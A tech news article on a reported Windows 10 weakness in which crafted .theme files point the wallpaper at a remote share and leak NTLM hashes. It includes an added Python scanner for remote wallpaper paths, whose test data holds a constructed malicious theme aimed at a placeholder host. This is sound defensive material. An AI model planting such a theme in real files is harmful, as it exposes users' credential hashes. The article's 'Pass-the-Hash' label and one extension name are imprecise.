Windows 10 Custom Themes Can Now Steal User Credentials

A security researcher recently discovered a vulnerability in Windows 10's custom theme settings that could allow hackers to steal account credentials from their victims.

For those unaware, a Windows theme is a collection of modifications to the interface that changes the way Windows looks and feels. A theme may alter the standard Windows icons, mouse cursor, sounds, and desktop background that the operating system uses.

Windows users can share their themes with other users via the Settings UI by right-clicking on the currently active theme under Personalization > Themes and selecting "Save theme for sharing". This packages the theme into a ".deskthemepack" file that can be shared via email or offered as a download on a website, from where others can download and install it.

Jimmy Bayne (@bohops), who found the loophole, revealed that specially crafted Windows themes could be used to carry out a "Pass-the-Hash" attack. The attacker could create a malicious theme file and point it at a page that prompts the user for credentials.

Pass-the-Hash is a hacking technique that allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a user's password, instead of requiring the associated plaintext password as is normally the case. It replaces the need to steal the plaintext password with merely stealing the hash and using that to authenticate.

Using this technique, an attacker could create a specially crafted ".theme" file and change the default desktop wallpaper to a website that requires credentials. When unsuspecting users apply this theme file and enter their credentials, an NTLM hash is sent to the site for authentication. That hash can then be cracked using password-cracking tools.
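A defender's counterpart to the technique above is to inspect a theme file before it is applied. A ".theme" file is INI-style text, and the Wallpaper key under [Control Panel\Desktop] (and ImagesRootPath under [Slideshow]) names the image Windows will load; a UNC path or URL there makes Windows fetch the image from a remote host. The following scanner is an added example, not code from the article or from the researcher; the two theme files it checks are constructed for the demonstration, and the hostnames in them are placeholders.

```python
"""Flag Windows .theme files whose wallpaper points to a remote location.

Added example (not from the original article). A .theme file is an INI-style
text file. The keys listed in PATH_KEYS hold paths that Windows resolves when
the theme is applied; a UNC path (\\host\share\...) or a URL there means the
image is fetched from a remote host. The sample themes below are constructed
for this demonstration and use placeholder hostnames.
"""
import configparser
import re
from typing import List, Tuple

# (section, key) pairs whose values are paths resolved when the theme is applied.
# Section names are compared case-insensitively; keys are lower-cased by configparser.
PATH_KEYS = {
    ("control panel\\desktop", "wallpaper"),
    ("slideshow", "imagesrootpath"),
}

# A value counts as remote if it is a UNC path (\\ or //) or a URL with a scheme.
REMOTE_RE = re.compile(r"^\s*(\\\\|//|[a-z][a-z0-9+.-]*://)", re.IGNORECASE)


def parse_theme(text: str) -> configparser.ConfigParser:
    """Parse .theme text. Interpolation is off so %SystemRoot% style values survive;
    only '=' is a delimiter so ':' inside URLs is kept; duplicates are tolerated."""
    cp = configparser.ConfigParser(
        interpolation=None, strict=False, delimiters=("=",), allow_no_value=True
    )
    cp.optionxform = str.lower  # key names are case-insensitive on Windows
    cp.read_string(text)
    return cp


def find_remote_paths(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) for every path key that refers to a remote resource."""
    cp = parse_theme(text)
    hits = []
    for section in cp.sections():
        for key, value in cp.items(section):
            if value is None:
                continue
            if (section.lower(), key) in PATH_KEYS and REMOTE_RE.match(value):
                hits.append((section, key, value))
    return hits


# Constructed sample: the wallpaper points at a remote share (placeholder host).
SUSPICIOUS_THEME = """\
[Theme]
DisplayName=Quarterly Report Theme

[Control Panel\\Desktop]
Wallpaper=\\\\files.example.invalid\\share\\wallpaper.jpg
TileWallpaper=0
WallpaperStyle=10

[MasterThemeSelector]
MTSM=DABJDKT
"""

# Constructed sample: a local wallpaper under the Windows directory.
BENIGN_THEME = """\
[Theme]
DisplayName=Local Theme

[Control Panel\\Desktop]
Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg
WallpaperStyle=10
"""


if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS_THEME), ("benign", BENIGN_THEME)):
        hits = find_remote_paths(text)
        verdict = "REMOTE PATH FOUND" if hits else "no remote paths"
        print(f"{name}: {verdict}")
        for section, key, value in hits:
            print(f"  [{section}] {key}={value}")
```

Themepack containers (".themepack" and ".deskthemepack") wrap a ".theme" file together with its resources; extracting the inner ".theme" and passing its text to `find_remote_paths` applies the same check. The scan only tells you that the theme would reach out to a remote host, which is exactly the behaviour worth refusing before the theme is applied.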

Bayne explained that users should be careful about downloading and installing theme packs published on the Web by other users. To protect a system from malicious themes, the researcher suggests blocking or re-associating the .theme, .themepack, and .desktopthemepackfile extensions with a different program.

Bayne reported these findings to Microsoft's Security Response Center (MSRC). However, the bug was not fixed because it was a "feature by design". It is unclear whether the company plans to fix the issue in the future.

Since most users log into their Microsoft accounts on Windows 10 to access email, OneDrive, and even Azure data, theft of these credentials also puts those services at risk. As a primary account-security measure, it is always better to enable two-factor authentication for your Microsoft accounts to prevent remote access by attackers.

Kavita Iyer, https://www.techworm.net
